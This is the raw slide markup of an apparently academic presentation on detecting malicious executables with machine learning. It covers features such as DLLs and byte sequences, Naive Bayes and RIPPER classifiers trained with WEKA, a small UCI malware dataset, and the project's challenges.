              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1607128"/>
            <a:ext cx="8915400" cy="5444836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Features: DLLs/GNU Strings/Byte Sequence(hex)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Algorithm:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>RIPPER/NB/Multi-NB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Best:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Multi-NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(97.76%)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Schultz, Matthew G., et al. "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Data mining methods for detection of new malicious executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Security and Privacy, 2001. S&amp;P 2001. Proceedings. 2001 IEEE Symposium on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. IEEE, 2001.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725924" y="3307158"/>
            <a:ext cx="8641976" cy="2665358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77115143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animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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dissolv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dissolv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dissolv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dissolv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Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="2259106"/>
            <a:ext cx="8915400" cy="377762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sz="2800" dirty="0" smtClean="0"/>
              <a:t>Use WEKA + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>train</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Generate new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>data points and test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="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54989" y="2259106"/>
            <a:ext cx="1508760" cy="792480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64559216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Originality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089342" y="2545422"/>
            <a:ext cx="2656198" cy="2124959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364894" y="2054085"/>
            <a:ext cx="3107635" cy="3107635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4745540" y="3607902"/>
            <a:ext cx="2619354" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:tailEnd type="triangle" w="lg" len="lg"/>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2265555" y="5357187"/>
            <a:ext cx="8035734" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>How should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> detect a known/unknown type of virus?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5591398" y="3033593"/>
            <a:ext cx="1241381" cy="1241381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79755163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Originality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089342" y="2545422"/>
            <a:ext cx="2656198" cy="2124959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364894" y="2054085"/>
            <a:ext cx="3107635" cy="3107635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301499" y="1905000"/>
            <a:ext cx="1507435" cy="1507435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4745540" y="3607902"/>
            <a:ext cx="2619354" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:tailEnd type="triangle" w="lg" len="lg"/>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6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5748226" y="3805782"/>
            <a:ext cx="613980" cy="1110022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651192" y="5357187"/>
            <a:ext cx="9093007" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>a virus can hide itself from the detection of antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20623422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Challenge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"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2800" dirty="0" smtClean="0"/>
              <a:t>No “names” file attached with the dataset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> attribute meaning unknown</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution: contact author for help; otherwise can only do blind tests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15920078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Malicious Executable Dataset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427847" y="1264555"/>
            <a:ext cx="8915400" cy="4184073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ataset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>retrieved from UCI ML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>repository</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>500 hex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>features, 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>72 benign samples, 301 virus samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427847" y="1954973"/>
            <a:ext cx="9764153" cy="1411193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740743" y="4520328"/>
            <a:ext cx="4425267" cy="2337672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480272" y="4661647"/>
            <a:ext cx="5711728" cy="2004874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8289634" y="2429736"/>
            <a:ext cx="935666" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>530</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5774376" y="3483391"/>
            <a:ext cx="1178873" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1703964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dissolv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dissolv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dissolve">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dissolv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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="4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Challenge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Low instance number (only 373 samples)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to exhaustively find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>best</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to classify malicious and non-malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>executables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>the low sample amount is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>tolerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214273630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Challenge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Difficulty in generating new data instances</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
